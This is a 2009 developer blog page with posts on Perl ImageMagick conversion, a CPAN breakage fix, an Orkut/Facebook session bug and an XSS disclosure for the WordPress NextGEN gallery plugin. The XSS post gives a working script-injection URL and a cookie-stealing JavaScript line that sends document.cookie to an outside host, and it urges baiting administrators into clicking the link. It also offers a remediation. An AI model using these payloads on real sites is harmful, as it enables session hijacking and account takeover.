Friday, July 31, 2009

This is what happens when you develop Orkut and Facebook Applications Simultaneously

The thing


Need I explain more?

Just in case, it's a dialog to add the application profile view into your Facebook profile, within Orkut.

Technical Details
It's just the session variables getting mixed up; everything else is fine. Still, I could not resist putting up a screenshot of it. Are you an application developer? Let me know...

Monday, July 27, 2009

Perl ImageMagick convert Images from one format to another

Introduction
A picture speaks louder than a thousand words. Most of the programming problems I have worked on dealt with just TEXT, so now I wanted to work with images programmatically. I needed to warp, rotate, scale, stretch, and convert from jpeg to png, png to jpeg, jpeg to bmp, bmp to jpeg etc. So I searched for a way to do such things easily. The first obvious answer is to handle all of this in C: read the files, uncompress them based on their extensions, compress them again, write the encoders and do a whole lot of "reinventing the wheel". Then I found this software called ImageMagick, which has already written the code to do all of this for you, and what's more, it has a neat Perl API so that you can do the fun stuff you do in Perl on images. Now that's sweet.

Hello World
Now just check out this simple script to convert files from one format to another.


#!/usr/bin/perl
#
# usage: perl im.pl <Source File> <Destination File>
#
# ImageMagick picks the output format from the destination file's extension.

use strict;
use warnings;
use Image::Magick;

die "usage: perl im.pl <Source File> <Destination File>\n" unless @ARGV == 2;

my ($source, $dest) = @ARGV;

my $q = Image::Magick->new;

# Image::Magick methods return an empty string on success and an error
# message otherwise, so check both the read and the write.
my $err = $q->Read($source);
die "Read of $source failed: $err\n" if "$err";

$err = $q->Write(filename => $dest);
die "Write of $dest failed: $err\n" if "$err";

exit;


That is all that is required to convert a file from one format to another using ImageMagick and the Perl Image::Magick API. For example
perl im.pl IMG_0021.JPG IMG_0021.BMP

would convert the JPG to BMP for you.

Friday, July 17, 2009

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

Intro

I need not explain what XSS actually is; for that, refer here. To see what I mean, check out the links given below. If you are using the NextGEN WordPress plugin, you are probably vulnerable.

The Vulnerability

The vulnerability in this WordPress plugin is in the pid, album and gallery GET variables.

http://www.example.com/wordpress/next-gen-gallery/?album=1&pid=3&gallery=2


On most sites the GET variables are printed directly into the <title> HTML tag of the page. So if you try something like
next-gen-gallery/?album=1&pid=3&gallery=2(XSS HOLE CAN BE HERE)

the title becomes
<title>Picture 3 &laquo; Album 1 &laquo; Gallery 2(XSS HOLE CAN BE HERE) &laquo; Next Gen Gallery &laquo; xxxxxxxxxxx WordPress Demo</title>


So we can insert our own custom HTML into the GET query, anything from harmless HTML tags to dangerous SCRIPT tags that allow cross-site scripting. Since WordPress is written in PHP, magic_quotes_gpc would by default be turned on (on older PHP installations) and the quotes would be escaped. So a simple test for XSS like

next-gen-gallery/?album=1&pid=3&gallery=2<title/><script>alert("hi");</script>

would fail, since the quotes around "hi" would appear as \"hi\". However, why worry about the quotes when something like this works:

next-gen-gallery/?album=1&pid=3&gallery=2<title/><script src=http://labs.kitiyo.com/store.php></script>


You can put any arbitrary code in the target file and it would get executed on the website. The following code can be used to steal the cookie:
(new Image()).src = 'http://labs.kitiyo.com/store.php?cookie='+document.cookie+'&location='+window.location;
window.location = "URL back to the page";


Then post this link accessible to site administrators or other registered users to click and hand us over their session cookies ;)

I am affected, now what do I do? (for webmasters)
The XSS is due to blindly printing the $_GET variables into the title. The makers of this plugin should note this and do the required validation on the GET parameters. Since the parameters are numeric, it should not be hard to apply an
is_numeric
check to them.
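A hardened way to build that title, as an added example in PHP; it is not the plugin's own code. It assumes the three GET parameters and the title layout shown above; gallery_param() is a hypothetical helper and the blog name is a constructed sample value. It uses ctype_digit rather than is_numeric because is_numeric also accepts forms such as "1e3" and leading whitespace.

```php
<?php
// Added example (not NextGEN's code): build the gallery <title> from the
// pid/album/gallery GET parameters without letting their raw contents reach
// the HTML. The original flaw was echoing $_GET values straight into <title>.

// Hypothetical helper: return the parameter as an integer, or null if it is
// absent or not purely [0-9]+. A bare (int) cast would silently turn
// "2<script>" into 2 and hide the attempt; rejecting it outright is clearer.
function gallery_param($name)
{
    if (!isset($_GET[$name])) {
        return null;
    }
    $value = $_GET[$name];
    // is_string guards against ?pid[]=1; ctype_digit accepts digits only.
    if (!is_string($value) || !ctype_digit($value)) {
        return null;
    }
    return (int) $value;
}

$pid     = gallery_param('pid');
$album   = gallery_param('album');
$gallery = gallery_param('gallery');

if ($pid === null || $album === null || $gallery === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Invalid gallery parameters');
}

// The three values are now integers, so interpolating them cannot inject
// markup. The blog name is still HTML-escaped as defence in depth, since it
// is free text that may contain '&' or '<'.
$blog_name = 'xxxxxxxxxxx WordPress Demo';   // constructed sample value
$title = sprintf(
    'Picture %d &laquo; Album %d &laquo; Gallery %d &laquo; Next Gen Gallery &laquo; %s',
    $pid,
    $album,
    $gallery,
    htmlspecialchars($blog_name, ENT_QUOTES, 'UTF-8')
);

echo "<title>$title</title>\n";
```

With this in place, a request carrying gallery=2<title/><script ...> is answered with 400 instead of a page whose title contains the injected tags.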

Don't Believe? Check out these links (XSS Demo)


Happy hacking ...
Fix the bugs
Cheers....

Wednesday, July 8, 2009

yum/apt-get update Breaks Perl CPAN

Doing a yum update or apt-get update and upgrading your system might break the Perl installation. This is the output I got after an update:


[root@desktop]# cpan

cpan shell -- CPAN exploration and modules installation (v1.7602)
ReadLine support enabled

cpan> install WWW::Mechanize
CPAN: Storable loaded ok
Going to read /root/.cpan/Metadata
Database was generated on Mon, 15 Jun 2009 02:27:28 GMT
Going to read /root/.cpan/sources/authors/01mailrc.txt.gz
CPAN: Compress::Zlib loaded ok
Going to read /root/.cpan/sources/modules/02packages.details.txt.gz
Database was generated on Wed, 08 Jul 2009 02:28:24 GMT
CPAN: HTTP::Date loaded ok

There's a new CPAN.pm version (v1.9402) available!
[Current version is v1.7602]
You might want to try
install Bundle::CPAN
reload cpan
without quitting the current session. It should be a seamless upgrade
while we are running...

CPAN: LWP::UserAgent loaded ok
Fetching with LWP:
ftp://ftp.jaist.ac.jp/pub/CPAN/modules/03modlist.data.gz
LWP failed with code[500] message[Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture (i386-linux-thread-multi-2.6.18-53.el5) at /usr/lib/perl5/site_perl/5.8.8/Errno.pm line 11.
Compilation failed in require at /usr/lib/perl5/5.8.8/i386-linux-thread-multi/IO/Socket.pm line 17.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/i386-linux-thread-multi/IO/Socket.pm line 17.
Compilation failed in require at /usr/lib/perl5/5.8.8/Net/FTP.pm line 18.
BEGIN failed--compilation aborted at /usr/lib/perl5/5.8.8/Net/FTP.pm line 18.
Compilation failed in require at /usr/lib/perl5/site_perl/5.8.8/LWP/Protocol/ftp.pm line 21.
]
Fetching with Net::FTP:
ftp://ftp.jaist.ac.jp/pub/CPAN/modules/03modlist.data.gz
Can't locate object method "new" via package "Net::FTP" at /usr/lib/perl5/5.8.8/CPAN.pm line 2250.


This is due to the architecture check in the Errno.pm module: the archname-osvers string recorded in that file no longer matches the one the Perl executable reports.

Fix
This can be called a fix, or rather a tweak: comment out these lines (add a # at the beginning of each) in
/usr/lib/perl5/site_perl/5.8.8/Errno.pm


"$Config{'archname'}-$Config{'osvers'}" eq
"i386-linux-thread-multi-2.6.18-53.1.14.el5pae" or
die "Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture ($Config{'archname'}-$Config{'osvers'})";

Change the lines to:

#"$Config{'archname'}-$Config{'osvers'}" eq
#"i386-linux-thread-multi-2.6.18-53.1.14.el5pae" or
# die "Errno architecture (i386-linux-thread-multi-2.6.18-53.1.14.el5pae) does not match executable architecture ($Config{'archname'}-$Config{'osvers'})";